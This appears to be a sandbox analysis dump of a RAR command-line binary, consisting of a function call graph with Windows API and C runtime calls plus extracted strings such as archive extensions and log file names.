39213->39214 39221 7ff60e5d91a9 39213->39221 39214->39221 39320 7ff60e607e74 39214->39320 39216 7ff60e61a610 _handle_error 8 API calls 39218 7ff60e5cb66e 39216->39218 39229 7ff60e5e2574 39218->39229 39219 7ff60e60d840 WideCharToMultiByte 39220 7ff60e5d9157 39219->39220 39220->39221 39222 7ff60e5d91c4 39220->39222 39223 7ff60e5d916a 39220->39223 39221->39216 39339 7ff60e5d9338 12 API calls _handle_error 39222->39339 39224 7ff60e5d91ab 39223->39224 39226 7ff60e5d916f 39223->39226 39338 7ff60e5d951c 71 API calls _handle_error 39224->39338 39226->39221 39324 7ff60e5d98b0 39226->39324 39230 7ff60e5e25a5 39229->39230 39231 7ff60e5e259e 39229->39231 39232 7ff60e5e25ab GetStdHandle 39230->39232 39237 7ff60e5e25ba 39230->39237 39231->38975 39232->39237 39233 7ff60e5e2619 WriteFile 39233->39237 39234 7ff60e5e25cf WriteFile 39235 7ff60e5e260b 39234->39235 39234->39237 39235->39234 39235->39237 39236 7ff60e5e2658 GetLastError 39236->39237 39237->39231 39237->39233 39237->39234 39237->39236 39242 7ff60e5e2721 39237->39242 39404 7ff60e5e3144 9 API calls 2 library calls 39237->39404 39405 7ff60e5dcf34 10 API calls 39237->39405 39406 7ff60e5dc95c 126 API calls 39237->39406 39239 7ff60e5e2684 SetLastError 39239->39237 39407 7ff60e5dcf14 10 API calls 39242->39407 39245 7ff60e5c161c 48 API calls 39244->39245 39246 7ff60e5cb719 39245->39246 39247 7ff60e5f8d38 48 API calls 39246->39247 39247->38997 39248->38999 39249->39000 39250->39002 39252 7ff60e5f9131 39251->39252 39253 7ff60e5f8fcf 39251->39253 39252->39056 39259 7ff60e5f905d 39253->39259 39408 7ff60e5dca6c 48 API calls 3 library calls 39253->39408 39254 7ff60e5e2574 126 API calls 39254->39252 39255 7ff60e5c161c 48 API calls 39256 7ff60e5f90e0 39255->39256 39256->39252 39256->39254 39258 7ff60e5f904c 39409 7ff60e5dca40 61 API calls _CxxThrowException 39258->39409 39259->39255 39259->39256 39261->39008 39263 7ff60e5cb8f8 CharToOemA 39262->39263 39263->39013 39264->39012 39265->39018 39266->39020 39267->39022 39268->39024 39269->39028 39270->39029 39271->39032 39272->39038 39273->39040 39274->39044 39275->39041 39277 7ff60e5c161c 48 API calls 39276->39277 39278 7ff60e5cbaf2 39277->39278 39278->39046 39278->39048 39278->39051 39279->38987 39280->38990 39281->38992 39282->38976 39285 7ff60e5f8efc 39283->39285 39284 7ff60e5f8d00 48 API calls 39284->39285 39285->39284 39286 7ff60e5cad24 39285->39286 39286->39132 39288 7ff60e5f8eac 39287->39288 39289 7ff60e5f8d00 48 API calls 39288->39289 39290 7ff60e5cb137 39288->39290 39289->39288 39290->39185 39291->39152 39292->39163 39293->39161 39294->39160 39295->39165 39296->39168 39297->39190 39298->39191 39299->39200 39300->39116 39301->39115 39305 7ff60e5c161c 39302->39305 39304 7ff60e5cb601 39304->38975 39304->38976 39304->39213 39306 7ff60e5c1640 39305->39306 39314 7ff60e5c16aa __BuildCatchObjectHelper 39305->39314 39307 7ff60e5c166d 39306->39307 39316 7ff60e5dca6c 48 API calls 3 library calls 39306->39316 39311 7ff60e5c16d4 39307->39311 39312 7ff60e5c168e 39307->39312 39309 7ff60e5c1661 39317 7ff60e5dcb64 8 API calls 39309->39317 39311->39314 39319 7ff60e5dcb64 8 API calls 39311->39319 39312->39314 39318 7ff60e5dcb64 8 API calls 39312->39318 39314->39304 39316->39309 39321 7ff60e607e95 39320->39321 39322 7ff60e5d9143 39320->39322 39323 7ff60e607ec8 68 API calls 39321->39323 39322->39219 39323->39322 39325 7ff60e5d9b45 39324->39325 39329 7ff60e5d9920 39324->39329 39326 7ff60e61a610 _handle_error 8 API calls 39325->39326 39327 7ff60e5d9b61 39326->39327 39327->39221 39330 7ff60e5d996d 39329->39330 39331 7ff60e5d9b75 39329->39331 39340 7ff60e607da8 39329->39340 39330->39330 39347 7ff60e5da0f4 39330->39347 39333 7ff60e607f24 68 API calls 39331->39333 39335 7ff60e5d9acb 39333->39335 39334 7ff60e5d99d0 39334->39334 39363 7ff60e607f24 39334->39363 39335->39325 39335->39335 39377 7ff60e604ea8 8 API calls _handle_error 39335->39377 39338->39221 39339->39221 39341 7ff60e607e74 68 API calls 39340->39341 39342 7ff60e607ddc 39341->39342 39343 7ff60e607e74 68 API calls 39342->39343 39344 7ff60e607def 39343->39344 39345 7ff60e61a610 _handle_error 8 API calls 39344->39345 39346 7ff60e607e43 39345->39346 39346->39329 39351 7ff60e5da15c __BuildCatchObjectHelper 39347->39351 39348 7ff60e5da358 39400 7ff60e61a774 8 API calls __report_securityfailure 39348->39400 39350 7ff60e5da352 39399 7ff60e61a774 8 API calls __report_securityfailure 39350->39399 39351->39348 39351->39350 39354 7ff60e5da192 39351->39354 39355 7ff60e5da34d 39351->39355 39353 7ff60e5da35e 39378 7ff60e5d9dd8 39354->39378 39398 7ff60e61a774 8 API calls __report_securityfailure 39355->39398 39358 7ff60e5da1d9 39359 7ff60e5d9dd8 8 API calls 39358->39359 39360 7ff60e5da2f1 39358->39360 39359->39358 39361 7ff60e61a610 _handle_error 8 API calls 39360->39361 39362 7ff60e5da33b 39361->39362 39362->39334 39364 7ff60e607f5e 39363->39364 39369 7ff60e607fb5 39363->39369 39365 7ff60e60b3f0 10 API calls 39364->39365 39364->39369 39366 7ff60e607f72 39365->39366 39366->39369 39370 7ff60e607f7e GetProcAddressForCaller GetProcAddress 39366->39370 39367 7ff60e60805c GetCurrentProcessId 39371 7ff60e608034 39367->39371 39368 7ff60e607ff1 39368->39371 39401 7ff60e5dca6c 48 API calls 3 library calls 39368->39401 39369->39367 39369->39368 39370->39369 39371->39335 39373 7ff60e60801f 39402 7ff60e5dcda4 10 API calls 2 library calls 39373->39402 39375 7ff60e608027 39403 7ff60e5dca40 61 API calls _CxxThrowException 39375->39403 39377->39325 39379 7ff60e5d9e46 39378->39379 39381 7ff60e5d9e6e __scrt_fastfail 39378->39381 39380 7ff60e609ce4 8 API calls 39379->39380 39382 7ff60e5d9e5e 39380->39382 39384 7ff60e5d9e85 39381->39384 39386 7ff60e609ce4 8 API calls 39381->39386 39383 7ff60e609b70 8 API calls 39382->39383 39383->39381 39385 7ff60e609ce4 8 API calls 39384->39385 39387 7ff60e5d9f97 39385->39387 39386->39384 39388 7ff60e609b70 8 API calls 39387->39388 39390 7ff60e5d9fa8 __scrt_fastfail 39388->39390 39389 7ff60e609ce4 8 API calls 39391 7ff60e5da0bb 39389->39391 39392 7ff60e609ce4 8 API calls 39390->39392 39394 7ff60e5d9fb4 39390->39394 39393 7ff60e609b70 8 API calls 39391->39393 39392->39394 39395 7ff60e5da0c9 39393->39395 39394->39389 39396 7ff60e61a610 _handle_error 8 API calls 39395->39396 39397 7ff60e5da0d8 39396->39397 39397->39358 39398->39350 39399->39348 39400->39353 39401->39373 39402->39375 39403->39371 39404->39239 39406->39237 39408->39258 39409->39259 39410 7ff60e62231c 39411 7ff60e62238c 39410->39411 39412 7ff60e622342 GetModuleHandleW 39410->39412 39423 7ff60e626938 EnterCriticalSection 39411->39423 39412->39411 39416 7ff60e62234f 39412->39416 39414 7ff60e626998 abort LeaveCriticalSection 39415 7ff60e622460 39414->39415 39418 7ff60e62246c 39415->39418 39421 7ff60e622488 11 API calls 39415->39421 39416->39411 39424 7ff60e6224d4 GetModuleHandleExW 39416->39424 39417 7ff60e622410 39417->39414 39419 7ff60e6243b8 16 API calls 39419->39417 39421->39418 39422 7ff60e622396 39422->39417 39422->39419 39425 7ff60e6224fe GetProcAddress 39424->39425 39426 7ff60e622525 39424->39426 39425->39426 39429 7ff60e622518 39425->39429 39427 7ff60e62252f FreeLibrary 39426->39427 39428 7ff60e622535 39426->39428 39427->39428 39428->39411 39429->39426 39430 7ff60e61b0fc 39449 7ff60e61aa8c 39430->39449 39434 7ff60e61b148 39439 7ff60e61b169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 39434->39439 39457 7ff60e62472c 39434->39457 39435 7ff60e61b123 __scrt_acquire_startup_lock 39435->39434 39505 7ff60e61b52c 7 API calls __scrt_fastfail 39435->39505 39438 7ff60e61b16d 39439->39438 39440 7ff60e61b1f7 39439->39440 39506 7ff60e622574 35 API calls __FrameUnwindToState 39439->39506 39461 7ff60e623fc4 39440->39461 39447 7ff60e61b220 39507 7ff60e61ac64 8 API calls 2 library calls 39447->39507 39450 7ff60e61aaae __isa_available_init 39449->39450 39508 7ff60e61e2f8 39450->39508 39456 7ff60e61aab7 39456->39435 39504 7ff60e61b52c 7 API calls __scrt_fastfail 39456->39504 39459 7ff60e624744 39457->39459 39458 7ff60e624766 39458->39439 39459->39458 39557 7ff60e61b010 39459->39557 39462 7ff60e623fd4 39461->39462 39464 7ff60e61b20c 39461->39464 39649 7ff60e623c84 39462->39649 39465 7ff60e5f7e20 39464->39465 39689 7ff60e60b470 GetModuleHandleW 39465->39689 39471 7ff60e5f7e58 SetErrorMode GetModuleHandleW 39472 7ff60e6048cc 21 API calls 39471->39472 39473 7ff60e5f7e7d 39472->39473 39474 7ff60e603e48 137 API calls 39473->39474 39475 7ff60e5f7e90 39474->39475 39476 7ff60e5d3d3c 126 API calls 39475->39476 39477 7ff60e5f7e9c 39476->39477 39478 7ff60e61a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39477->39478 39479 7ff60e5f7ead 39478->39479 39480 7ff60e5f7ebf 39479->39480 39481 7ff60e5d3f18 70 API calls 39479->39481 39482 7ff60e5d4d1c 157 API calls 39480->39482 39481->39480 39483 7ff60e5f7ed6 39482->39483 39484 7ff60e5f7eef 39483->39484 39485 7ff60e5d6ad0 154 API calls 39483->39485 39486 7ff60e5d4d1c 157 API calls 39484->39486 39487 7ff60e5f7ee7 39485->39487 39488 7ff60e5f7eff 39486->39488 39490 7ff60e5d4e48 160 API calls 39487->39490 39489 7ff60e5f7f0d 39488->39489 39492 7ff60e5f7f14 39488->39492 39491 7ff60e60b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39489->39491 39490->39484 39491->39492 39493 7ff60e5d4888 58 API calls 39492->39493 39494 7ff60e5f7f57 39493->39494 39495 7ff60e5d4fd0 268 API calls 39494->39495 39496 7ff60e5f7f5f 39495->39496 39497 7ff60e5f7f9e 39496->39497 39498 7ff60e5f7f8c 39496->39498 39502 7ff60e61b684 GetModuleHandleW 39497->39502 39499 7ff60e60b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39498->39499 39500 7ff60e5f7f93 39499->39500 39500->39497 39501 7ff60e60b57c 14 API calls 39500->39501 39501->39497 39503 7ff60e61b698 39502->39503 39503->39447 39504->39435 39505->39434 39506->39440 39507->39438 39509 7ff60e61e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39508->39509 39521 7ff60e61eb08 39509->39521 39513 7ff60e61e318 39515 7ff60e61aab3 39513->39515 39528 7ff60e61eb50 DeleteCriticalSection 39513->39528 39515->39456 39516 7ff60e6245e4 39515->39516 39517 7ff60e629d4c 39516->39517 39518 7ff60e61aac0 39517->39518 39545 7ff60e6266c0 39517->39545 39518->39456 39520 7ff60e61e32c 8 API calls 3 library calls 39518->39520 39520->39456 39522 7ff60e61eb10 39521->39522 39524 7ff60e61eb41 39522->39524 39526 7ff60e61e30b 39522->39526 39529 7ff60e61e678 39522->39529 39534 7ff60e61eb50 DeleteCriticalSection 39524->39534 39526->39515 39527 7ff60e61e8a4 8 API calls 3 library calls 39526->39527 39527->39513 39528->39515 39535 7ff60e61e34c 39529->39535 39532 7ff60e61e6cf InitializeCriticalSectionAndSpinCount 39533 7ff60e61e6bb 39532->39533 39533->39522 39534->39526 39536 7ff60e61e3b2 39535->39536 39540 7ff60e61e3ad 39535->39540 39536->39532 39536->39533 39537 7ff60e61e47a 39537->39536 39539 7ff60e61e489 GetProcAddress 39537->39539 39538 7ff60e61e3e5 LoadLibraryExW 39538->39540 39541 7ff60e61e40b GetLastError 39538->39541 39539->39536 39543 7ff60e61e4a1 39539->39543 39540->39536 39540->39537 39540->39538 39544 7ff60e61e458 FreeLibrary 39540->39544 39541->39540 39542 7ff60e61e416 LoadLibraryExW 39541->39542 39542->39540 39543->39536 39544->39540 39556 7ff60e626938 EnterCriticalSection 39545->39556 39547 7ff60e6266d0 39548 7ff60e628050 32 API calls 39547->39548 39549 7ff60e6266d9 39548->39549 39550 7ff60e6266e7 39549->39550 39552 7ff60e6264d0 34 API calls 39549->39552 39551 7ff60e626998 abort LeaveCriticalSection 39550->39551 39553 7ff60e6266f3 39551->39553 39554 7ff60e6266e2 39552->39554 39553->39517 39555 7ff60e6265bc GetStdHandle GetFileType 39554->39555 39555->39550 39558 7ff60e61b020 pre_c_initialization 39557->39558 39578 7ff60e622b00 39558->39578 39560 7ff60e61b02c pre_c_initialization 39584 7ff60e61aad8 39560->39584 39562 7ff60e61b045 39563 7ff60e61b049 _RTC_Initialize 39562->39563 39564 7ff60e61b0b5 39562->39564 39589 7ff60e61ace0 39563->39589 39621 7ff60e61b52c 7 API calls __scrt_fastfail 39564->39621 39566 7ff60e61b0bf 39622 7ff60e61b52c 7 API calls __scrt_fastfail 39566->39622 39568 7ff60e61b05a pre_c_initialization 39592 7ff60e623b0c 39568->39592 39570 7ff60e61b0ca __scrt_initialize_default_local_stdio_options 39570->39459 39573 7ff60e61b06a 39620 7ff60e61b7dc RtlInitializeSListHead 39573->39620 39575 7ff60e61b06f pre_c_initialization 39576 7ff60e624818 pre_c_initialization 35 API calls 39575->39576 39577 7ff60e61b09a pre_c_initialization 39576->39577 39577->39459 39579 7ff60e622b11 39578->39579 39583 7ff60e622b19 39579->39583 39623 7ff60e624f3c 15 API calls _set_errno_from_matherr 39579->39623 39581 7ff60e622b28 39624 7ff60e624e1c 31 API calls _invalid_parameter_noinfo 39581->39624 39583->39560 39585 7ff60e61ab96 39584->39585 39588 7ff60e61aaf0 __scrt_initialize_onexit_tables __scrt_acquire_startup_lock 39584->39588 39625 7ff60e61b52c 7 API calls __scrt_fastfail 39585->39625 39587 7ff60e61aba0 39588->39562 39626 7ff60e61ac90 39589->39626 39591 7ff60e61ace9 39591->39568 39593 7ff60e623b2a 39592->39593 39594 7ff60e623b40 39592->39594 39631 7ff60e624f3c 15 API calls _set_errno_from_matherr 39593->39631 39633 7ff60e629370 39594->39633 39597 7ff60e623b2f 39632 7ff60e624e1c 31 API calls _invalid_parameter_noinfo 39597->39632 39600 7ff60e623b72 39637 7ff60e6238ec 35 API calls pre_c_initialization 39600->39637 39601 7ff60e61b066 39601->39566 39601->39573 39603 7ff60e623b9c 39638 7ff60e623aa8 15 API calls 2 library calls 39603->39638 39605 7ff60e623bb2 39606 7ff60e623bcb 39605->39606 39607 7ff60e623bba 39605->39607 39640 7ff60e6238ec 35 API calls pre_c_initialization 39606->39640 39639 7ff60e624f3c 15 API calls _set_errno_from_matherr 39607->39639 39610 7ff60e624a74 __free_lconv_mon 15 API calls 39610->39601 39611 7ff60e623be7 39612 7ff60e623c17 39611->39612 39613 7ff60e623c30 39611->39613 39617 7ff60e623bbf 39611->39617 39641 7ff60e624a74 39612->39641 39615 7ff60e624a74 __free_lconv_mon 15 API calls 39613->39615 39615->39617 39616 7ff60e623c20 39618 7ff60e624a74 __free_lconv_mon 15 API calls 39616->39618 39617->39610 39619 7ff60e623c2c 39618->39619 39619->39601 39621->39566 39622->39570 39623->39581 39624->39583 39625->39587 39627 7ff60e61acbf 39626->39627 39629 7ff60e61acb5 _onexit 39626->39629 39630 7ff60e624434 34 API calls _onexit 39627->39630 39629->39591 39630->39629 39631->39597 39632->39601 39634 7ff60e62937d 39633->39634 39635 7ff60e623b45 GetModuleFileNameA 39633->39635 39647 7ff60e6291b0 48 API calls 5 library calls 39634->39647 39635->39600 39637->39603 39638->39605 39639->39617 39640->39611 39642 7ff60e624a79 RtlFreeHeap 39641->39642 39643 7ff60e624aa9 __free_lconv_mon 39641->39643 39642->39643 39644 7ff60e624a94 39642->39644 39643->39616 39648 7ff60e624f3c 15 API calls _set_errno_from_matherr 39644->39648 39646 7ff60e624a99 GetLastError 39646->39643 39647->39635 39648->39646 39650 7ff60e623ca1 39649->39650 39651 7ff60e623c98 39649->39651 39650->39464 39651->39650 39655 7ff60e623ccc 39651->39655 39656 7ff60e623caa 39655->39656 39657 7ff60e623ce5 39655->39657 39656->39650 39667 7ff60e623e78 17 API calls 2 library calls 39656->39667 39658 7ff60e629370 pre_c_initialization 48 API calls 39657->39658 39659 7ff60e623cea 39658->39659 39668 7ff60e62978c GetEnvironmentStringsW 39659->39668 39662 7ff60e623cf7 39665 7ff60e624a74 __free_lconv_mon 15 API calls 39662->39665 39664 7ff60e623d04 39666 7ff60e624a74 __free_lconv_mon 15 API calls 39664->39666 39665->39656 39666->39662 39667->39650 39669 7ff60e6297ba WideCharToMultiByte 39668->39669 39670 7ff60e62985e 39668->39670 39669->39670 39674 7ff60e629814 39669->39674 39672 7ff60e629868 FreeEnvironmentStringsW 39670->39672 39673 7ff60e623cef 39670->39673 39672->39673 39673->39662 39680 7ff60e623d38 31 API calls 4 library calls 39673->39680 39681 7ff60e624ab4 39674->39681 39677 7ff60e629824 WideCharToMultiByte 39678 7ff60e62984b 39677->39678 39679 7ff60e624a74 __free_lconv_mon 15 API calls 39678->39679 39679->39670 39680->39664 39682 7ff60e624aff 39681->39682 39686 7ff60e624ac3 __vcrt_getptd_noexit 39681->39686 39688 7ff60e624f3c 15 API calls _set_errno_from_matherr 39682->39688 39684 7ff60e624ae6 RtlAllocateHeap 39685 7ff60e624afd 39684->39685 39684->39686 39685->39677 39685->39678 39686->39682 39686->39684 39687 7ff60e6236c0 new 2 API calls 39686->39687 39687->39686 39688->39685 39690 7ff60e60b496 GetProcAddress 39689->39690 39691 7ff60e5f7e45 39689->39691 39692 7ff60e60b4cb GetProcAddress 39690->39692 39693 7ff60e60b4ae 39690->39693 39694 7ff60e5d7a68 39691->39694 39692->39691 39693->39692 39695 7ff60e5d7a76 39694->39695 39715 7ff60e622ae4 39695->39715 39697 7ff60e5d7a80 39698 7ff60e622ae4 setbuf 60 API calls 39697->39698 39699 7ff60e5d7a94 39698->39699 39724 7ff60e5d7b44 GetStdHandle GetFileType 39699->39724 39702 7ff60e5d7b44 3 API calls 39703 7ff60e5d7aae 39702->39703 39704 7ff60e5d7b44 3 API calls 39703->39704 39706 7ff60e5d7abe 39704->39706 39705 7ff60e5d7b12 39714 7ff60e5dcd78 SetConsoleCtrlHandler 39705->39714 39708 7ff60e5d7aeb 39706->39708 39727 7ff60e622abc 31 API calls 2 library calls 39706->39727 39708->39705 39729 7ff60e622abc 31 API calls 2 library calls 39708->39729 39709 7ff60e5d7adf 39728 7ff60e622b40 33 API calls 3 library calls 39709->39728 39712 7ff60e5d7b06 39730 7ff60e622b40 33 API calls 3 library calls 39712->39730 39717 7ff60e622ae9 39715->39717 39716 7ff60e627ee8 39731 7ff60e624f3c 15 API calls _set_errno_from_matherr 39716->39731 39717->39716 39720 7ff60e627f23 39717->39720 39719 7ff60e627eed 39732 7ff60e624e1c 31 API calls _invalid_parameter_noinfo 39719->39732 39733 7ff60e627d98 60 API calls 2 library calls 39720->39733 39723 7ff60e627ef8 39723->39697 39725 7ff60e5d7a9e 39724->39725 39726 7ff60e5d7b61 GetConsoleMode 39724->39726 39725->39702 39726->39725 39727->39709 39728->39708 39729->39712 39730->39705 39731->39719 39732->39723 39733->39723 39734 7ff60e60bb70 39737 7ff60e60bb80 39734->39737 39746 7ff60e60bae8 39737->39746 39739 7ff60e60bb79 39741 7ff60e60bbc8 SetEvent 39742 7ff60e60bbd5 LeaveCriticalSection 39741->39742 39743 7ff60e60bae8 67 API calls 39742->39743 39744 7ff60e60bb97 39743->39744 39744->39739 39751 7ff60e5d1690 39744->39751 39755 7ff60e60b974 WaitForSingleObject 39746->39755 39749 7ff60e60bb16 EnterCriticalSection LeaveCriticalSection 39750 7ff60e60bb12 39749->39750 39750->39744 39752 7ff60e5d16c2 EnterCriticalSection 39751->39752 39753 7ff60e5d16a4 39751->39753 39752->39741 39752->39742 39753->39752 39763 7ff60e5d1180 39753->39763 39756 7ff60e60b986 GetLastError 39755->39756 39757 7ff60e60b9b7 39755->39757 39761 7ff60e5dca6c 48 API calls 3 library calls 39756->39761 39757->39749 39757->39750 39759 7ff60e60b9a6 39762 7ff60e5dca40 61 API calls _CxxThrowException 39759->39762 39761->39759 39762->39757 39764 7ff60e5d11ab 39763->39764 39772 7ff60e5d11b0 39763->39772 39773 7ff60e5d17c8 216 API calls 2 library calls 39764->39773 39766 7ff60e5d166a 39766->39753 39767 7ff60e5f6d38 216 API calls 39767->39772 39768 7ff60e5f6fe8 216 API calls 39768->39772 39769 7ff60e5d1080 48 API calls 39769->39772 39770 7ff60e5f6e90 216 API calls 39770->39772 39772->39766 39772->39767 39772->39768 39772->39769 39772->39770 39774 7ff60e5d17c8 216 API calls 2 library calls 39772->39774 39773->39772 39774->39772 39775 7ff60e629c74 39776 7ff60e629c7c 39775->39776 39777 7ff60e629cbb 39776->39777 39778 7ff60e629cac 39776->39778 39779 7ff60e629cc5 39777->39779 39797 7ff60e62ce08 32 API calls 2 library calls 39777->39797 39796 7ff60e624f3c 15 API calls _set_errno_from_matherr 39778->39796 39784 7ff60e624b8c 39779->39784 39783 7ff60e629cb1 __scrt_fastfail 39785 7ff60e624bab 39784->39785 39786 7ff60e624ba1 39784->39786 39788 7ff60e624bb0 39785->39788 39794 7ff60e624bb7 __vcrt_getptd_noexit 39785->39794 39787 7ff60e624ab4 setbuf 16 API calls 39786->39787 39793 7ff60e624ba9 39787->39793 39789 7ff60e624a74 __free_lconv_mon 15 API calls 39788->39789 39789->39793 39790 7ff60e624bf6 39798 7ff60e624f3c 15 API calls _set_errno_from_matherr 39790->39798 39791 7ff60e624be0 RtlReAllocateHeap 39791->39793 39791->39794 39793->39783 39794->39790 39794->39791 39795 7ff60e6236c0 new 2 API calls 39794->39795 39795->39794 39796->39783 39797->39779 39798->39793 39799 7ff60e5c7a5b 39800 7ff60e5c7a60 39799->39800 39801 7ff60e5d9be0 14 API calls 39800->39801 39802 7ff60e5c7af7 39800->39802 39801->39802 39803 7ff60e5c7bda 39802->39803 39832 7ff60e5e1e1c GetFileTime 39802->39832 39805 7ff60e5cb540 147 API calls 39803->39805 39806 7ff60e5c7bf8 39805->39806 39809 7ff60e5c7c3e 39806->39809 39833 7ff60e619b98 216 API calls 3 library calls 39806->39833 39808 7ff60e5cb540 147 API calls 39811 7ff60e5c7c9c 39808->39811 39809->39808 39810 7ff60e5c7f89 39811->39810 39834 7ff60e5e6378 39811->39834 39813 7ff60e5c7cd7 39814 7ff60e5e6378 4 API calls 39813->39814 39816 7ff60e5c7cf3 39814->39816 39815 7ff60e5c7de1 39822 7ff60e5c7e4e 39815->39822 39839 7ff60e5f98dc 39815->39839 39816->39815 39818 7ff60e5c7d59 39816->39818 39819 7ff60e5c7d38 39816->39819 39821 7ff60e61a444 new 4 API calls 39818->39821 39820 7ff60e61a444 new 4 API calls 39819->39820 39826 7ff60e5c7d42 std::bad_alloc::bad_alloc 39820->39826 39821->39826 39845 7ff60e5c1204 48 API calls 39822->39845 39824 7ff60e5c7eb3 39827 7ff60e5c7edb 39824->39827 39846 7ff60e5f9680 39824->39846 39826->39815 39838 7ff60e61ba34 RtlPcToFileHeader RaiseException 39826->39838 39852 7ff60e5e6424 8 API calls _handle_error 39827->39852 39829 7ff60e5c7f56 39831 7ff60e5cb540 147 API calls 39829->39831 39831->39810 39832->39803 39833->39809 39835 7ff60e5e6396 39834->39835 39837 7ff60e5e63a0 39834->39837 39836 7ff60e61a444 new 4 API calls 39835->39836 39836->39837 39837->39813 39838->39815 39840 7ff60e5f993c 39839->39840 39841 7ff60e5f9926 39839->39841 39843 7ff60e5d90b8 75 API calls 39840->39843 39842 7ff60e5d90b8 75 API calls 39841->39842 39844 7ff60e5f9934 39842->39844 39843->39844 39844->39822 39845->39824 39851 7ff60e5f96a4 39846->39851 39847 7ff60e5f97d7 39848 7ff60e5e2574 126 API calls 39848->39851 39850 7ff60e619b98 216 API calls 39850->39851 39851->39847 39851->39848 39851->39850 39853 7ff60e5e6498 72 API calls new 39851->39853 39852->39829 39853->39851 39854 7ff60e60a924 39855 7ff60e60a949 snprintf 39854->39855 39856 7ff60e60a97f CompareStringA 39855->39856
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                                                                                                                                                                                                                • API String ID: 0-1628410872
                                                                                                                                                                                                                                                • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                                • Instruction ID: c1d1bf34ca1aa2e1b454f6917b50cbb90e5fab9880eabec5429227f304e0c461
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99C2E67A90C1B3C1EB369B2480641BD2791EF21794F784935FA4ECB2C9DEAEE546C350
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                                                                                                • API String ID: 0-1660254149
                                                                                                                                                                                                                                                • Opcode ID: c2369d2e3c74217ef505e2eec276ef1c21a4c5d2cf15e006b71fca984afe60b6
                                                                                                                                                                                                                                                • Instruction ID: 5647b9227b3bf75fc38565edb1796069533591c0aa533fd4f6033c488b717d34
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2369d2e3c74217ef505e2eec276ef1c21a4c5d2cf15e006b71fca984afe60b6
